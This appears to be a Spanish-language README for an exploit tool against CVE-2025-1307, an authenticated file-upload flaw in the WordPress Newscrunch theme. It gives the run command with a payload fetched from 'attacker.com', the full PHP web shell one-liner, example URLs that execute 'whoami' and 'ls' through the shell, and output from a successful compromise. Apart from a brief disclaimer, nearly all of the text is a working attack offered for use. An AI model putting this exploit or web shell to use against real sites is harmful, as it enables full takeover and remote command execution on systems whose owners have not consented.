
Newscrunch <= 1.8.4 - Autenticado (Suscriptor+) Subida arbitraria de archivos
Este exploit se dirige a una vulnerabilidad crítica (CVE-2025-1307) en el tema Newscrunch de WordPress. La falla permite a usuarios autenticados (Suscriptor y superiores) subir archivos arbitrarios debido a la falta de comprobaciones de capacidad en la función newscrunch_install_and_activate_plugin(). Esto puede conducir a Ejecución Remota de Código (RCE), comprometiendo completamente el sitio WordPress afectado.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HExplotabilidad: Requiere una cuenta válida de WordPress con privilegios de Suscriptor o superiores.
✅ Explotación automatizada de CVE-2025-1307
✅ Detección automática de la versión vulnerable del tema
✅ Extracción y ejecución automática del payload ZIP
✅ Obtiene dinámicamente el nombre del archivo shell del ZIP
✅ Comprueba automáticamente la disponibilidad del shell después de la explotación
✅ Registro limpio y estructurado para depuración
Asegúrate de tener Python 3.x instalado e instala las dependencias requeridas:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
Una vez que el shell se sube correctamente, permite la ejecución remota de comandos en el sistema objetivo. El archivo del shell debe colocarse dentro de un archivo ZIP y se extraerá automáticamente durante la explotación.
Asegúrate de que tu shell PHP (shell.php) esté dentro de un archivo ZIP. Luego, sube el archivo ZIP usando el exploit.
<?php system($_GET['cmd']); ?>
Puedes ejecutar comandos del sistema a través del navegador añadiendo el parámetro cmd a la URL del shell:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
Esta herramienta es solo para fines educativos y de investigación en seguridad. La explotación no autorizada de vulnerabilidades es ilegal y está penada por la ley. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Úsala de forma responsable.
Por: Nxploit | Khaled Alenazi